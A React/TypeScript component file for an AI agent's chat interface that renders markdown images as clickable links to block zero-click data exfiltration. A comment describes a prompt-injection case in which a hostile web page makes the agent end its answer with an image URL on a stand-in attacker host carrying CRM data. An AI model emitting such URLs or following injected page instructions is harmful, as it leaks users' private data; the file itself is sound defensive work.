import type { Components } from 'streamdown';

// Open links in a new tab. Streamdown sanitizes/transforms the href in the
// markdown AST before this renders, so the href here is already hardened.
//
// Never load images from assistant output. The agent reads untrusted web
// pages, so an injected page can make it end an answer with
// `![](https://evil.example/p.png?d=<crm data>)`, and the browser would send
// that request as soon as the message renders, with no click. Streamdown allows
// any image origin, so images are rendered as plain links instead: opening one
// takes a deliberate click. This also covers raw `<img>` HTML, which goes
// through the same component map.
// Streamdown's own anchor classes. This component replaces that anchor (new
// tab, no remote images), so the classes have to be set again or Tailwind's
// preflight leaves every chat URL as plain text.
const LINK_CLASS_NAME = 'wrap-anywhere font-medium text-primary underline';

export const mdComponents: Components = {
  a: ({ href, title, children }) => (
    <a
      className={LINK_CLASS_NAME}
      href={href}
      title={title}
      target="_blank"
      rel="noopener noreferrer"
    >
      {children}
    </a>
  ),
  img: ({ src, alt }) =>
    typeof src === 'string' && src !== '' ? (
      <a
        className={LINK_CLASS_NAME}
        href={src}
        target="_blank"
        rel="noopener noreferrer"
      >
        {alt || src}
      </a>
    ) : null,
};
